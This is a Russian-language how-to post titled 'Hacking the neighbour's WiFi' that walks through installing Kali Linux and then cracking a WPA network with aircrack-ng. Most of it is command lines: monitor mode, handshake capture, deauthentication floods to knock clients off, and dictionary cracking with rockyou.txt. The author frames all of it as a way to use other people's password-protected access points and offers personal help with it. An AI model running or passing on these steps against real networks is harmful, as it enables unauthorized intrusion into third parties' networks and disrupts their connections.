Взлом соседского Wifi

Взлом соседского Wifi

Abraham
Салют! Сегодня расскажу как пользоваться чужими, запароленными точками доступа.


Для начала у вас уже должен быть установлен дистрибутив Linux. Желательно kali linux, т.к в нем уже есть достаточно большой набор программ по взлому.

Для установки потребуется usb flesh от 4 gb

Сам дистрибутив, скачанный с оф сайта https://www.kali.org/downloads/

Программка по созданию загрузочной флешки https://unetbootin.github.io/

Скачиваем свежую версию unetbootin, впихиваем в него iso архив с системой. жмем создать.

Перезагружаемся, В биос выбираем загрузку с флешки, далее по шагам установщика.

Если возникнут проблемы, пишите мне. всегда помогу @LincolnAbraham


Не советую использовать через виртуалку. Будет достаточно много гемороя с оптимизацией работы отдельных программ.


Теперь у нас есть минимальный, хакерский набор.

Заходим в терминал и приступаем к взлому, вводя по очередности команды ( не забываем менять адреса, названия словарей и файлы с перехваченными рукопожатиями)

Взлом WIFI Aircrack-ng 


airmon-ng check kill  Остановить все процессы lan


airmon-ng start wlan0  Запуск режима мониторинг


airodump-ng wlan0mon   мониторинг доступных точек


ловим рукопожатие


airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack wlan0mon --ignore-negative-one


-с канал сети

--bssid 00:11:22.... адрес точки доступа

-w название файла сохранения (по умолчанию в папку\root)

--ignore-negative-one  Убирает сообщение ‘fixed channel : -1’


Заставляем отключится клиента


aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon --ignore-negative-one

или

aireplay-ng --deauth 100 -a 00:11:22:33:44:55 wlan0mon --ignore-negative-one


--deauth 100     Сколько deauth сообщений отправить (0 — без ограничений)

-a MAC адрес точки доступа

-c     MAC адрес клиента (можно без клиента, но менее эфективно и более палевно)

wlan0mon Сетевой интерфейс


Ждем надписи в верхней строчки WPA handshake: 00:11:22:33:44:55



Подбор пароля по словарю

Указывать путь к словарю, можно просто перетаскивая в окно терминала


aircrack-ng -w '/usr/share/wordlists/rockyou.txt' -b 00:11:22:33:44:55 WPAcrack.cap


-w Путь к словарю с паролями (Перетягиваем в терминал любой текстовый фаил с паролями)

-b   MAC адрес точки доступа

WPAcrack.cap Файл, содержащий перехваченное рукопожатие (Перетягиваем в терминал фаил с рукопожатием)

Если все успешно перебор паролей остановится и вы увидите его в центре окна терминала

По возникшим вопросам пишите, с радостью помогу и научу @LincolnAbraham

Report Page